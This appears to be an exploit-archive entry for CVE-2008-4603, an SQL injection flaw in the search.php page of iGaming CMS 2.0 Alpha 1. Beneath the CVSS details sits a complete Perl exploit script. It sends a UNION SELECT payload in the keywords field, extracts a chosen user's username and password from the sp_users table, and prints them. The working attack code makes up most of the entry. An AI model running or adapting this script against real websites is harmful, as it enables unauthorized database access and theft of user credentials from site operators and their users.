iGaming CMS 2.0 Alpha 1 (search.php) Remote SQL Injection Exploit

2008-10-20 / 2008-10-21
Credit: StAkeR aka athos
Risk: High
Local: No
Remote: Yes
CVE: CVE-2008-4603
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl # ----------------------------------------------------- # iGaming CMS 2.0 Alpha 1 Remote SQL Injection Exploit # By StAkeR aka athos - StAkeR[at]hotmail[dot]it # On 16/10/2008 # http://www.igamingcms.com/iGaming_2_Alpha.zip # ----------------------------------------------------- use strict; use LWP::UserAgent; my ($host,$id) = @ARGV; usage() unless $host =~ /http:\/\/(.+?)$/ and $id =~ /^[0-9]/; my $etc = "' union select 1,concat(0x616E6172636879,". "password,0x3a,username,0x616E6172636879),3". ",4,5 from sp_users where id=$id#"; my @search = ($etc,'all',0,'Search','search_games'); my @split = undef; my $http = new LWP::UserAgent; my $post = $http->post($host.'/search.php', [ keywords => $search[0], platform => $search[1], exact => $search[2], submit => $search[3], do => $search[4] ]); if($post->is_success) { if($post->as_string =~ /anarchy(.+?)anarchy/) { @split = split(':',$1); print "Username: $split[0]\r\n"; print "Password: $split[1]\r\n"; } else { print "Exploit Failed!\r\n"; } } sub usage { print "iGaming CMS 2.0 Alpha 1 Remote SQL Injection Exploit\r\n"; print "Usage: perl $0 http://[host] [user_id]\r\n"; exit; } __END__

References:

http://www.securityfocus.com/bid/31793
http://www.milw0rm.com/exploits/6769


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top